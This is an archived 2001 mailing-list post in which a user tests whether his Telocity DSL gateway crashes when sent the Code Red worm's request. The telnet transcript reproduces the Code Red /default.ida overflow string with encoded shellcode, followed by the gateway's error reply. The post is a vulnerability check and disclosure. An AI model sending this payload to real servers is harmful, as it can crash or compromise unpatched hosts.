code red & telocity gateway

From: Emre Yildirin (emreat_private)
Date: Tue Aug 07 2001 - 22:20:00 PDT

Next message: Amer Karim: "Re: CR II - winME? confirmation? (Slightly OT)"

Previous message: kam: "Re: CR II - winME? confirmation? (Slightly OT)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160


Hi folks,

Lately I had to reset my Telocity/Direct TV DSL gateway many times.  I 
thought it had something to do with code red so I started playing around with 
it.  Just like the Cisco DSL routers, the Telocity gateway has a web 
interface.  It lets you check connection status and stats on the gateway, but 
won't let you change any configuration.  It looks like the Telocity x2 model 
does not suffer from the issue that most of Cisco's DSL routers suffer from.  
After issuing the same request that code red sends out, my Telocity gateway 
stayed running.

$ telnet 12.34.56.78 80
Trying 12.34.56.78...
Connected to 12.34.56.78.
Escape character is '^]'.
GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
 HTTP/1.0
HTTP/1.0 501 Not Implemented
Connection: close
Server: Gateway WindWeb/1.1
Date: THU JAN 01 14:42:47 1970
Content-Type: text/html
WWW-Authenticate: Basic realm="Gateway"

Telocity Expressway Web Server Error Report: V1.1<HR>
<H1>Server Error: 501 Not Implemented</H1>
Operating System Error Nr:3997700: errno = 0x3d0004 <P><HR><H2>No RPM for 
this combination of URL and method</H2><P><HR>please mail problems to 
supportat_private <A HREF="mailto:supportat_private"><ADDRESS> Telocity 
Communications Inc. 10355 N. De Anza Blvd. San Jose, CA, 
95014-2027</ADDRESS></A>
Connection closed by foreign host.


12.34.56.78 is my gateway's IP.  If the gateway was vulnerable (which it's 
not obviously) this would not be an issue, since it only accepts connection 
to port 80 from certain IP addresses (like the DSL IP).  I'm not sure if it 
accepts only the IPs it issues the DSL user, or IPs from the *.telocity.net 
network.  If that is the case, then this would suck.  I couldn't test the old 
model (x1) which is the boxy beige box, so if anyone has one of those please 
tell me if that one is vulnerable.

Anway, just my $0.02 :-)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (NetBSD) 
Comment: http://network.asper.org/emre-dsa.asc

iD8DBQE7cMwG28cbRfnkodERA8XVAJ98cLrzy5CwxVwzXly233RrnRGzTwCgrhk1
qGsnTdeDAJHMphSWKcuJoJM=
=6ezu
-----END PGP SIGNATURE-----

Next message: Amer Karim: "Re: CR II - winME? confirmation? (Slightly OT)"
Previous message: kam: "Re: CR II - winME? confirmation? (Slightly OT)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 17:44:51 PDT